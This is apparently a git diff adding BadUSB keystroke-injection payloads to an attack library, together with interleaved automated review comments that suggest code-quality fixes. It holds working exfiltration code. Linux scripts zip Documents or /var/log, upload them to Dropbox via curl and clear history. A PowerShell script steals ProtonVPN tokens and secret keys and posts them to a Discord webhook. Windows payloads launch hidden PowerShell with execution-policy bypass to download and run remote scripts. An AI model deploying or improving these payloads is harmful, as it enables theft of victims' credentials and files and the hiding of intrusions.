+ENTER +DELAY 500 + +REM Close shell +STRING exit +ENTER diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md new file mode 100644 index 0000000..2d8078a --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md 
@@ -0,0 +1,32 @@ +# Exfiltrate Linux Content With Dropbox - BADUSB ✅ + +A script used to take folder content on Linux Systems. + +**Category**: Exfiltration, Execution + +[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) + +## Description + +A script used to take folder content on Linux Systems. + +Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history. + +## Getting Started + +### Dependencies + +* Internet Connection +* Linux System +* * Terminal that can be opened by the shortcommand CTRL-ALT t +* DropBox Account for the access token + +### Executing program + +* Plug in your device + +### Settings + +* Set your dropbox access token +* Set the folder path interessed (i.e. /Documents) +* Change (if you think that it is necessary) the delay of the zipping operation diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt new file mode 100644 index 0000000..3f9524b --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt 
@@ -0,0 +1,82 @@ +REM ########################################################## +REM # | +REM # Title : Exfiltrate Linux Content With Dropbox | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Execution | +REM # Target : Linux | +REM # | +REM ########################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + + +DELAY 1000 +CTRL-ALT t + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + +DELAY 500 +STRING USER_NAME=$(whoami) +ENTER + +DELAY 500 +STRING path="/home/$USER_NAME/Documents" +ENTER + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING NAME="$RANDOM.zip" +ENTER + +DELAY 500 +STRING ZIP_PATH="$path/$NAME" +ENTER + +DELAY 500 +REM The FOLDER that you want to zip, in this example you want to zip all Documents content +STRING FOLDER="/home/$USER_NAME/Documents/" +ENTER + +REM Delay for zipping operation, it depends by computer power and folder directory +DELAY 10000 + +DELAY 500 +STRING if [ -r "$FOLDER" ]; then +ENTER +STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1 +ENTER +STRING else +ENTER +STRING echo "" +ENTER +STRING fi +ENTER + +DELAY 500 +STRING DROPBOX_FOLDER="/$NAME" +ENTER + + +DELAY 500 +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +DELAY 2000 +STRING history -c +ENTER diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md new file mode 100644 index 0000000..1ea1e56 --- /dev/null 
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md @@ -0,0 +1,33 @@ + +# Exfiltrate Linux Log Files - BADUSB ✅ + +A script used to take linux logs. + +**Category**: Exfiltration, Execution + +[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) + +## Description + +A script used to take linux logs. + +Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder. + +## Getting Started + +### Dependencies + +* Internet Connection +* Linux System +* * Terminal that can be opened by the shortcommand CTRL-ALT t +* DropBox Account for the access token + +### Executing program + +* Plug in your device + +### Settings + +* Set your dropbox access token +* Change if needed the folder path interessed (i.e. /var/log) +* Change (if you think that it is necessary) the delay of the zipping operation diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt new file mode 100644 index 0000000..dbd546f --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt 
@@ -0,0 +1,80 @@ +REM ###################################################### +REM # | +REM # Title : Exfiltrate Linux Logs With Dropbox | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Execution | +REM # Target : Linux | +REM # | +REM ###################################################### + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + + +DELAY 1000 +CTRL-ALT t + +REM Required: Set here your Dropbox access TOKEN +DELAY 2000 +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + + +DELAY 500 +STRING USER_NAME=$(whoami) +ENTER + +REM Create random num +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +REM Folder path +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX) +ENTER + +REM Zip path +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER +DELAY 500 +STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" +ENTER + +REM Default log path +DELAY 500 +STRING LOG_PATH="/var/log/" +ENTER + +DELAY 500 +STRING zip -r "$ZIP_PATH" "$LOG_PATH" +ENTER + +REM Delay of zipping operation - it depends +DELAY 10000 + +DELAY 500 +STRING DROPBOX_FOLDER="/$ZIP_NAME" +ENTER + +REM Send to Dropbox function +DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload +DELAY 500 +STRING curl -X POST +STRING DROPBOX_API_LINK +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +REM Send timing - it depends +DELAY 5000 + +DELAY 500 +STRING rm -rf "$TMP_FOLDER_PATH" +ENTER diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md new file mode 100644 index 0000000..db8dadb --- /dev/null 
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md @@ -0,0 +1,27 @@ + +# Exfiltrate Network Configuration - Linux ✅ + +A script used to exfiltrate the network configuration on a Linux machine. + +**Category**: Exfiltrate, Execution + +## Description + +A script used to exfiltrate the network configuration on a Linux machine. + +Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces. + +## Getting Started + +### Dependencies + +* Internet Connection +* Dropbox Token + +### Executing program + +* Plug in your device + +### Settings + +* Set the Dropbox token \ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt new file mode 100644 index 0000000..91230a9 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt 
@@ -0,0 +1,96 @@ + +REM ########################################################## +REM # | +REM # Title : Exfiltrate Linux Network Configuration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Execution | +REM # Target : Linux | +REM # | +REM ########################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + +DELAY 1000 +CTRL-ALT t + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + +REM DELAY 500 +REM STRING USER_NAME=$(whoami) +REM ENTER + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER +DELAY 500 +STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" +ENTER + +REM Folder path +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) +ENTER + +DELAY 500 +STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt" +ENTER + +DELAY 1000 +STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" +ENTER + +DELAY 1000 +STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" +ENTER + +DELAY 1000 +REM Delay for zipping operation, it depends by computer power and folder directory +STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" +DELAY 3000 + + +REM Set yout Dropbox folder name +DEFINE DROPBOX_FOLDER_NAME example +STRING DROPBOX_FOLDER="/ +ENTER +STRING DROPBOX_FOLDER_NAME +ENTER +STRING " +ENTER +DELAY 500 + +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +DELAY 2000 +STRING history -c +ENTER + +DELAY 500 +STRING rm -rf 
"$TMP_FOLDER_PATH" +ENTER + +DELAY 500 +STRING rm -rf "$ZIP_PATH" +ENTER + +DELAY 500 +STRING exit +ENTER \ No newline at end of file diff --git a/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 new file mode 100644 index 0000000..a36a30f --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 @@ -0,0 +1,37 @@ +$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config" + +$Content = Get-Content -Path $Path + +$text = $Path + $Content + +# Discord Connection +$hookurl = "$discord" + +# Loop for Discord +$ConstantLimitForRestMethod = 1999 +$TMP_Body = @{ + 'username' = $env:username + 'content' = "" +} + for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){ + try { + $TMP_Body = @{ + 'username' = $env:username + 'content' = $text.Substring($i, $ConstantLimitForRestMethod) + } + } catch [ArgumentOutOfRangeException] { + if($text.Length-$i -gt 0){ + $TMP_Body = @{ + 'username' = $env:username + 'content' = $text.Substring($i, $text.Length-$i) + } + } else { + break + } + } + Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json) +} + + +# Clear the PowerShell command history +Clear-History \ No newline at end of file diff --git a/payloads/library/exfiltration/ProtonVPN-config/README.md b/payloads/library/exfiltration/ProtonVPN-config/README.md new file mode 100644 index 0000000..dba980d --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/README.md 
@@ -0,0 +1,37 @@ +# ProtonVPN config file ✅ + +A script used to stole target ProtonVPN config file. + +**Category**: Credentials, Exfiltration + +## Description + +This script will stole target ProtonVPN config file. + +Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +In the config file you can find a lot information about the user like: +- UserUid +- UserAccessToken +- UserRefreshToken +- UserAuthenticationPublicKey +- UserAuthenticationSecretKey +- UserAuthenticationCertificatePem +- UserCertificationServerPublicKey +- and so on... + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* ProtonVPN user logged at least one time +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke Get-Content for get in plaintext the ProtonVPN .config content +* Invoke-WebRequest will be entered in the Run Box to send the content + diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt new file mode 100644 index 0000000..796d694 --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt 
@@ -0,0 +1,43 @@ +REM ################################################################### +REM # | +REM # Title : ProtonVPN-config-to-Discord-Exfiltration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Credentials, Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ################################################################### + +REM Title: ProtonVPN-config-to-Discord-Exfiltration +REM Author: Aleff +REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +REM In the config file you can find a lot information about the user like: +REM - UserUid +REM - UserAccessToken +REM - UserRefreshToken +REM - UserAuthenticationPublicKey +REM - UserAuthenticationSecretKey +REM - UserAuthenticationCertificatePem +REM - UserCertificationServerPublicKey +REM - and so on... +REM Then it cleans up traces of what you have done after. +REM Target: Windows 10-11 (PowerShell + ProtonVPN software) +REM Version: 1.0 +REM Category: Credentials, Exfiltration +REM Requirements: ProtonVPN user logged at least one time and internet connection +REM + +REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks// +DEFINE WEBHOOK example.com + +DELAY 2000 +GUI r +DELAY 250 +DELETE +STRING powershell -w h -ep bypass $discord=' +STRING WEBHOOK + +REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1 +DEFINE PAYLOAD example.com +STRING ';irm PAYLOAD | iex +ENTER diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md b/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md index 061f0e3..2f0b3bf 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md 
@@ -6,7 +6,7 @@ ## Description -This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.* +This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.* ## Usage @@ -34,9 +34,9 @@ This payload exfiltrates Windows system information and installed programs from - **Prepare your payload** - - Download the Powershell script ".ps1". + - Download the Powershell script "script.ps1". - Modify it to include the , , and of your application. - - Upload your modified ".ps1" file to Dropbox and copy the upload link. + - Upload your modified "script.ps1" file to Dropbox and copy the upload link. - Replace the end of the link from "?dl=0" to "?dl=1" *This is your "".* - Download the "payload.txt" file. 
@@ -44,9 +44,13 @@ This payload exfiltrates Windows system information and installed programs from ### Analysis -Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system. +Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system. -The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com). +You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system. + +You can check if the user has dangerous permissions that can be exploited. + +The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com). --- diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt b/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt index 24e2dcf..a3752e5 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt 
@@ -12,6 +12,6 @@ GUI r
 DELAY 500
 STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
 STRING DOWNLOAD_LINK
-STRING ; invoke-expression $pl
+STRING ; iex $pl
 DELAY 500
 ENTER
diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1 b/payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1
similarity index 69%
rename from payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1
rename to payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1
index e233fd2..9a072a4 100644
--- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1
+++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1
@@ -3,4 +3,4 @@ #Replace with the actual "Refresh Token" of your app. -Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = ""; client_id = ""; client_secret = ""}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null +Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = ""; client_id = ""; client_secret = ""}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null 
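Review bot: script.ps1 is a single-line build of the report that source.ps1 (next hunk) assembles across three `$body` statements, and neither file says so; this commit already had to change the report format in both places in lockstep, which is exactly where the two copies will start to drift. A header comment in script.ps1 such as `# Single-line build of source.ps1 - edit source.ps1 first and regenerate this file` would make the relationship explicit, with a matching pointer in source.ps1. The same applies to the source.ps1 hunk that follows.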
diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 b/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 index 375173d..943e191 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 @@ -36,7 +36,11 @@ $headers = @{ #Define the report for the file upload -$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" +$body = "# System Information #`n $(SYSTEMINFO | Out-String)" + +$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)" + +$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" #Upload the report to Dropbox using the headers and body defined above diff --git a/payloads/library/exfiltration/Windows-Product-Duckey/README.md b/payloads/library/exfiltration/Windows-Product-Duckey/README.md index cb84b67..8ec1beb 100644 --- a/payloads/library/exfiltration/Windows-Product-Duckey/README.md +++ b/payloads/library/exfiltration/Windows-Product-Duckey/README.md @@ -16,10 +16,10 @@ This payload exfiltrate the target's Windows product key to a remote server. *On ``` python -m http.server 80 ``` -- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server. -- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address: +- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server. +- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address: ``` -http:///.ps1 +http:///script.ps1 ``` ### Analysis 
diff --git a/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt b/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt index 0060955..c192d07 100644 --- a/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt +++ b/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt @@ -12,6 +12,6 @@ GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http:// STRING REMOTE_IP_ADDRESS -STRING /.ps1; invoke-expression $pl +STRING /.ps1; iex $pl DELAY 500 ENTER diff --git a/payloads/library/exfiltration/Windows-Product-Duckey/.ps1 b/payloads/library/exfiltration/Windows-Product-Duckey/script.ps1 similarity index 100% rename from payloads/library/exfiltration/Windows-Product-Duckey/.ps1 rename to payloads/library/exfiltration/Windows-Product-Duckey/script.ps1 diff --git a/payloads/library/exfiltration/Windows-netstat/README.md b/payloads/library/exfiltration/Windows-netstat/README.md new file mode 100644 index 0000000..309e994 --- /dev/null +++ b/payloads/library/exfiltration/Windows-netstat/README.md 
@@ -0,0 +1,41 @@ +# Windows netstat ✅ + +A script used to stole target netstat status. + +**Category**: Net, Exfiltration + +## Description + +This script will stole target netstat status. + +Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke the indicated commands +* Invoke-WebRequest will be entered in the Run Box to send the content + +### Settings +Put 1 on the function that you want to active, else 0. +Functions available: +- default (*or simple 'netstat' command*) +- routing_table **$r** +- listening_canonical **$lc** +- listening_numerical **$ln** +- all_canonical **$ac** +- all_numerical **$an** +- offload **ot** +- proto **$p "\"** + - *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".* + + diff --git a/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 b/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 new file mode 100644 index 0000000..ab02861 --- /dev/null +++ b/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 
@@ -0,0 +1,79 @@
+
+# Discord send function
+function exfiltration () {
+ param(
+ [Parameter (Mandatory = $true, Position=0)] [String]$command,
+ [Parameter (Mandatory = $true, Position=1)] [String]$text
+ )
+ # Loop for Discord
+ $ConstantLimitForRestMethod = 1999
+ $TMP_Body = @{
+ 'username' = $command
+ 'content' = ""
+ }
+ for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
+ try {
+ $TMP_Body = @{
+ 'username' = $command
+ 'content' = $text.Substring($i, $ConstantLimitForRestMethod)
+ }
+ } catch [ArgumentOutOfRangeException] {
+ if($text.Length-$i -gt 0){
+ $TMP_Body = @{
+ 'username' = $command
+ 'content' = $text.Substring($i, $text.Length-$i)
+ }
+ } else {
+ break
+ }
+ }
+ Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
+ }
+}
+
+# send command format
+function send_command(){
+ param(
+ [Parameter (Mandatory = $true, Position=0)] [String]$cmd
+ )
+ $out = Invoke-Expression $cmd
+ (exfiltration $cmd [string]$out)
+}
+
+# Settings
+if ( $d -eq "1") {
+ $cmd = "netstat"
+ (send_command $cmd)
+}
+if ( $r -eq "1") {
+ $cmd = "netstat -r"
+ (send_command $cmd)
+}
+if ( $lc -eq "1") {
+ $cmd = "netstat -af"
+ (send_command $cmd)
+}
+if ( $ln -eq "1") {
+ $cmd = "netstat -an"
+ (send_command $cmd)
+}
+if ( $ac -eq "1") {
+ $cmd = "netstat -qf"
+ (send_command $cmd)
+}
+if ( $an -eq "1") {
+ $cmd = "netstat -qn"
+ (send_command $cmd)
+}
+if ( $o -eq "1") {
+ $cmd = "netstat -t"
+ (send_command $cmd)
+}
+if ( $p -ne "" ) {
+ # format $proto="TCP"
+ $cmd = "netstat -ps " + $p
+ (send_command $cmd)
+}
+
+# Clear the PowerShell command history
+Clear-History
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt
new file mode 100644
index 0000000..8728395
--- /dev/null
+++ b/payloads/library/exfiltration/Windows-netstat/payload.txt
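Review bot: The chunking loop in `exfiltration` relies on catching `ArgumentOutOfRangeException` from `Substring` to detect the last, shorter chunk, which is exception-as-control-flow and also hides any other out-of-range cause; computing the length directly removes the try/catch: `$len = [Math]::Min($ConstantLimitForRestMethod, $text.Length - $i)` followed by `'content' = $text.Substring($i, $len)`. The first `$TMP_Body = @{ ... 'content' = "" }` assignment before the loop is dead, since every iteration overwrites it. The script also reads `$discord`, `$d`, `$r`, `$lc`, `$ln`, `$ac`, `$an`, `$o` and `$p` as globals that the caller is expected to set before `irm PAYLOAD | iex` (see payload.txt in the next hunk), but no comment in the file names these inputs or the values they accept; a header comment listing each variable with its accepted values would make the contract visible, and `send_command`/`exfiltration` would read better under PowerShell Verb-Noun naming.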
@@ -0,0 +1,45 @@
+REM ###################################################################
+REM # |
+REM # Title : Windows-netstat-to-Discord-Exfiltration |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Net, Exfiltration |
+REM # Target : Windows 10-11 |
+REM # |
+REM ###################################################################
+
+REM Title: Windows-netstat-to-Discord-Exfiltration
+REM Author: Aleff
+REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+REM Put 1 on the function that you want to active, else 0. Functions available:
+REM - default (simple 'netstat' command)
+REM - routing_table $r
+REM - listening_canonical $lc
+REM - listening_numerical $ln
+REM - all_canonical $ac
+REM - all_numerical $an
+REM - offload ot
+REM - proto $p ""
+REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
+
+REM Target: Windows 10-11 (PowerShell)
+REM Version: 1.0
+REM Category: Net, Exfiltration
+REM Requirements: Internet connection
+REM
+
+REM REQUIRED - Provide your Discord WEBHOOK
+DEFINE WEBHOOK https://discordapp.com/api/webhooks//
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass $discord='
+
+STRING WEBHOOK
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
+DEFINE PAYLOAD example.com
+STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
+ENTER
diff --git a/payloads/library/mobile/WhatsappMessageSender/payload.txt b/payloads/library/mobile/WhatsappMessageSender/payload.txt
new file mode 100644
index 0000000..1cd8eac
--- /dev/null
+++ b/payloads/library/mobile/WhatsappMessageSender/payload.txt
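Review bot: The header comment lists the offload toggle as `ot`, but the injected command sets `$o='1'` and Windows-netstat.ps1 tests `$o`; the same `ot` appears in the README hunk above, whose example also calls the protocol variable `$proto` where both the script and this payload use `$p`. Change the comment to `REM - offload $o` and align the README with it. `REM REQUIRED - Reply example.com with YOUR LINK` should read `Replace`, and `DEFINE WEBHOOK https://discordapp.com/api/webhooks//` has lost its two placeholder segments (possibly a rendering artifact); the DEFINE should carry visibly labelled placeholders so a reader knows what to fill in.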
@@ -0,0 +1,61 @@
+REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
+REM # TITLE: Whatsapp Message Sender
+REM #
+REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.0
+REM #
+REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it.
+REM #
+REM # Tested OS: Android version 12
+REM #
+REM # Note: Script won't work on locked devices
+REM #
+REM # Date: 08/03/2023
+REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+DEFINE PHONENUMBER +91XXXXXXXXXX
+DEFINE MESSAGE Hi this is Gopalsamy Rajendran
+
+REM #-------------------------------------------------
+REM # Below lines will open search engine and type https://
+DELAY 1000
+GUI r
+DELAY 100
+STRING h
+DELAY 100
+STRING t
+DELAY 100
+STRING t
+DELAY 100
+STRING p
+DELAY 100
+STRING s
+DELAY 500
+DELAY 100
+STRING :
+DELAY 100
+STRING /
+DELAY 100
+STRING /
+DELAY 100
+REM #-------------------------------------------------
+
+REM #-------------------------------------------------
+REM # Below lines will enter wa.me after https://
+REM # Replace the mobile number with your's
+
+STRING wa.me/
+STRING PHONENUMBER
+ENTER
+DELAY 5000
+REM #-------------------------------------------------
+
+REM #-------------------------------------------------
+REM # Below message will be sent to the target number confiugured above
+REM # Replace the message with your own message
+STRING MESSAGE
+TAB
+TAB
+ENTER
+DELAY 1000
+REM #-------------------------------------------------
+
diff --git a/payloads/library/prank/EternalLock b/payloads/library/prank/EternalLock
new file mode 100644
index 0000000..2aaee31
